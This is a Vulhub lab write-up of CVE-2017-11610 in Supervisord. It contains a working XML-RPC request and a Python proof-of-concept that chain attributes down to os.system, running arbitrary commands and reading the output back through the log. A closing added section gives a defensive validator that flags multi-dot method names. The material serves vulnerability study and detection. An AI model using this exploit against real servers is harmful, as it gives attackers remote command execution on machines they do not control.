Vulhub vulnerability recurrence 67_ Supervisor
2022-07-06 05:16:00 【Revenge_ scan】
CVE-2017-11610_ Supervisord Remote command execution vulnerability
Preface
Supervisor (http://supervisord.org/) is a client/server service developed in Python. It is a process management tool for Linux/Unix systems and does not support Windows. It makes it easy to monitor, start, stop, and restart one or more processes.
Reference links:
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
- https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
Vulnerability environment
Target range: 192.168.4.10_ubuntu
```
#docker-compose build
docker-compose up -d
```
After the environment starts, visit `http://your-ip:9001` to view the Supervisord page.
Vulnerability testing
Execute arbitrary commands directly:
```
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```
Checking inside the container confirms that `/tmp/success` was created.
## About direct echo POC
@Ricter proposed an idea on Weibo that works very well: write the output of the executed command into the log file, then call Supervisord's built-in `readLog` method to read the log file and retrieve the result.
I wrote a simple POC, [poc.py](poc.py), posted here directly:
```python
#!/usr/bin/env python3
import xmlrpc.client
import sys

target = sys.argv[1]
command = sys.argv[2]

with xmlrpc.client.ServerProxy(target) as proxy:
    # Remember the current log length so only new output is printed
    old = getattr(proxy, 'supervisor.readLog')(0, 0)
    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
    # Append the command output to supervisord's own log file
    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
    # Read the log back and print only the part added by this command
    result = getattr(proxy, 'supervisor.readLog')(0, 0)
    print(result[len(old):])
```
Run it with Python 3 to execute a command and get its output: `./poc.py "http://your-ip:9001/RPC2" "command"`
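Both the raw request above and the POC rely on the same root cause: the vulnerable dispatcher resolved a dotted `methodName` by walking object attributes, so a long dotted name could reach `os.system`. The following added example (not code from the writeup or from the Supervisor project) shows the check a defender can run over XML-RPC request bodies, for instance in a WAF rule or an IDS parser: a legitimate supervisord call has the shape `namespace.method` with exactly one dot, and the namespace allowlist (`supervisor`, `system`) and the one-dot rule are this example's assumptions. The sample request bodies are constructed here, the malicious one being the body shown earlier on this page.

```python
#!/usr/bin/env python3
"""Defender-side check for CVE-2017-11610-style method names in XML-RPC bodies.

A legitimate supervisord XML-RPC call looks like 'supervisor.getState'.
Anything with more than one dot is an attempt to traverse into internal
objects and should be rejected and logged. The allowlist and the
one-dot rule are assumptions made for this example, not the project's code.
"""
import xmlrpc.client
from typing import Dict, Tuple

# Namespaces a stock supervisord RPC endpoint exposes (assumption for this example).
ALLOWED_NAMESPACES = {"supervisor", "system"}

# Constructed sample bodies: the request from the writeup and a benign call.
MALICIOUS_BODY = """<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params><param><string>touch /tmp/success</string></param></params>
</methodCall>"""

BENIGN_BODY = """<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.getState</methodName>
<params></params>
</methodCall>"""


def method_name_of(body: str) -> str:
    """Parse an XML-RPC methodCall body and return its methodName."""
    _params, name = xmlrpc.client.loads(body)
    return name


def validate_method_name(name: str) -> Tuple[bool, str]:
    """Return (ok, reason). Accepts only 'namespace.method' with a known namespace."""
    parts = name.split(".")
    if len(parts) != 2:
        return False, "expected exactly one dot, got {} (object traversal attempt)".format(len(parts) - 1)
    namespace, method = parts
    if namespace not in ALLOWED_NAMESPACES:
        return False, "unknown namespace {!r}".format(namespace)
    if not method or method.startswith("_"):
        return False, "private or empty method name"
    return True, "ok"


def inspect_request(body: str) -> Dict[str, object]:
    """Return a small verdict record suitable for a log line or a block decision."""
    name = method_name_of(body)
    ok, reason = validate_method_name(name)
    return {"method": name, "allowed": ok, "reason": reason}


if __name__ == "__main__":
    for body in (MALICIOUS_BODY, BENIGN_BODY):
        print(inspect_request(body))
```

The check deliberately validates the method name before anything is dispatched, which is the same place a patched server has to enforce the rule; a traversal attempt then shows up as a rejected request with the full dotted name preserved in the log for triage.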